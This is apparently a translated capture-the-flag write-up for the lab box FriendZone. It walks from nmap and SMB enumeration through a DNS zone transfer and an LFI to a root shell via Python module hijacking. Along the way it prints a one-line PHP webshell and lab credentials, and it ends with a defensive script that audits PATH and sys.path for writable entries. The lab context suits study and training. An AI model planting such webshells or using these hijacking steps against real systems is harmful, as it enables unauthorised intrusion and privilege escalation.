Introduction:
The target is not a CMS-based system; it can be taken over through a DNS weakness (zone transfer), an LFI, and hijacking. There were three sticking points along the way, which are summarized at the end.
Box status: completed
Contents
- SMB
- Zone_Transfer
- LFI
- Hijacking
SMB
nmap
Scan the machine's IP address with nmap to find the open ports and their services.
# Nmap 7.70 scan initiated Sat May 25 23:31:31 2019 as: nmap -sC -sV -oA FriendZone 10.10.10.123
Nmap scan report for 10.10.10.123
Host is up (0.27s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -59m46s, deviation: 1h43m51s, median: 10s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2019-05-25T18:32:12+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-05-25 23:32:06
|_ start_date: N/A
ftp
Anonymous FTP login was attempted and failed.
netbios-ssn Samba
Use smbmap and smbclient to inspect the Samba service over an anonymous (guest) login and search the files there for sensitive information.
root@kali:~# smbmap -u guest -H 10.10.10.123
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.123...
[+] IP: 10.10.10.123:445 Name: 10.10.10.123
Disk Permissions
---- -----------
print$ NO ACCESS
Files NO ACCESS
general READ ONLY
Development READ, WRITE
IPC$ NO ACCESS
root@kali:~# cat creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
Zone_Transfer
The machine has port 53 (DNS) open, so try to gather information from DNS.
dig
There is a trap here. At first I used the friendzoneportal.red email suffix from the web page and queried dig for subdomains of friendzoneportal.red, but could not find a way in. Later I saw in a write-up that the subdomains of friendzone.red are the ones to query; I am not yet clear on the specific reason (though the nmap output above does show friendzone.red as the commonName of the port 443 certificate). After enumerating all the subdomains, the usable one is administrator1.friendzone.red.
root@kali:~# dig axfr friendzoneportal.red @FriendZone.htb
; <<>> DiG 9.11.5-P4-3-Debian <<>> axfr friendzoneportal.red @FriendZone.htb
;; global options: +cmd
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red. 604800 IN AAAA ::1
friendzoneportal.red. 604800 IN NS localhost.
friendzoneportal.red. 604800 IN A 127.0.0.1
admin.friendzoneportal.red. 604800 IN A 127.0.0.1
files.friendzoneportal.red. 604800 IN A 127.0.0.1
imports.friendzoneportal.red. 604800 IN A 127.0.0.1
vpn.friendzoneportal.red. 604800 IN A 127.0.0.1
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 252 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Sat Jun 01 03:31:49 EDT 2019
;; XFR size: 9 records (messages 1, bytes 309)
# continuing after reading the write-up
➜ ~ dig axfr friendzone.red @FriendZone.htb
; <<>> DiG 9.10.6 <<>> axfr friendzone.red @FriendZone.htb
;; global options: +cmd
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red. 604800 IN AAAA ::1
friendzone.red. 604800 IN NS localhost.
friendzone.red. 604800 IN A 127.0.0.1
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 234 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Thu Jun 20 11:12:25 CST 2019
;; XFR size: 8 records (messages 1, bytes 261)
The zone transfers reveal the names friendzoneportal.red., admin.friendzoneportal.red., files.friendzoneportal.red., imports.friendzoneportal.red., vpn.friendzoneportal.red., friendzone.red., administrator1.friendzone.red., hr.friendzone.red. and uploads.friendzone.red., nine in total.
LFI
Visit the administrator1.friendzone.red site and log in with the credentials found on the SMB share. The site contains an LFI; by writing a webshell into the Development directory through the SMB share, a reverse shell can be obtained.
<?php
system("/bin/sh -");
?>
With the webshell, user.txt can be read successfully.
Hijacking
From the webshell, the MySQL database credentials are found in the web root:
mysql_data.conf:
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
Log in to SSH with these credentials. Searching for exploitable weaknesses with LinEnum.sh turned up nothing, but watching hidden activity with pspy64 revealed two interesting things: when a new user logs in, environment variables are set with root privileges and the cut command is executed via a relative path; and the machine periodically runs /usr/bin/python /opt/server_admin/reporter.py as root. Given these two findings, the options for privilege escalation are hijacking cut, hijacking a Python package, or modifying /opt/server_admin/reporter.py.
Checking writable directories with find / -type d -writable 2>/dev/null shows that the directories in PATH are not writable, but /usr/lib/python2.7 is. Hijacking cut is therefore a dead end; going the Python route, privilege escalation was finally achieved by hijacking Python's os package.
friend@FriendZone:/tmp$ cat owef.txt
b0e6c60b8*********656a9e90c7
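As an added example that is not part of the original write-up, the following audit script checks, from the defender's side, the two conditions that made the escalation above possible: a search path (PATH for the root-run cut, sys.path for the root-run reporter.py) that contains a relative entry or a directory which non-root users can write to. The trusted-uid set is an assumption; the sample modes and uids in the comments are constructed.

```python
import os
import stat
import sys

TRUSTED_UIDS = (0,)  # assumption: only root should own dirs searched by root-run programs


def classify_dir(path, mode, uid, trusted_uids=TRUSTED_UIDS):
    """Pure check on one search-path entry; returns the reasons it is unsafe (empty if fine)."""
    reasons = []
    if not os.path.isabs(path):
        # "" or "." in PATH/sys.path is resolved against the caller's cwd (Python 2 adds it by default)
        reasons.append("relative or empty entry (resolved against the cwd)")
    if mode & stat.S_IWOTH:
        # the sticky bit only stops deleting others' files; dropping a new os.py or cut is still allowed
        reasons.append("world-writable" + (" (sticky)" if mode & stat.S_ISVTX else ""))
    elif mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if uid not in trusted_uids:
        reasons.append("owned by uid %d, not a trusted uid" % uid)
    return reasons


def audit_search_path(entries, trusted_uids=TRUSTED_UIDS):
    """stat() each existing directory in `entries`; return {entry: [reasons]} for the unsafe ones."""
    findings = {}
    for entry in dict.fromkeys(entries):  # de-duplicate while keeping search order
        try:
            st = os.stat(entry or ".")
        except OSError:
            continue  # missing entry: only abusable if its parent is writable, not checked here
        if not stat.S_ISDIR(st.st_mode):
            continue
        reasons = classify_dir(entry, st.st_mode, st.st_uid, trusted_uids)
        if reasons:
            findings[entry] = reasons
    return findings


if __name__ == "__main__":
    # audit PATH as a privileged login hook or cron job would inherit it, and this interpreter's module path
    checks = (("PATH", os.environ.get("PATH", "").split(os.pathsep)), ("sys.path", sys.path))
    for label, entries in checks:
        for entry, reasons in audit_search_path(entries).items():
            print("%s: %s -> %s" % (label, entry or "(empty)", "; ".join(reasons)))
```

Run it as the account whose environment the privileged job inherits; a writable /usr/lib/python2.7 as on this box is reported under sys.path as world-writable.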
Sticking points
Sticking point 1: when querying zone transfers with dig, I overlooked the friendzone.red zone. But why would one think to query that zone? Guessing is probably my weakest area; I did not think to look there, so for a long time I could not find the HAHA page.
Sticking point 2: after finding the HAHA page, a PHP file has to be loaded through the LFI, but I could not find a valid directory for a long time. Only after scanning the SMB port with nmap's built-in enum scripts did I discover that nmap's enumeration shows the physical file path behind each share.
Sticking point 3: Python hijacking, encountered for the first time.
References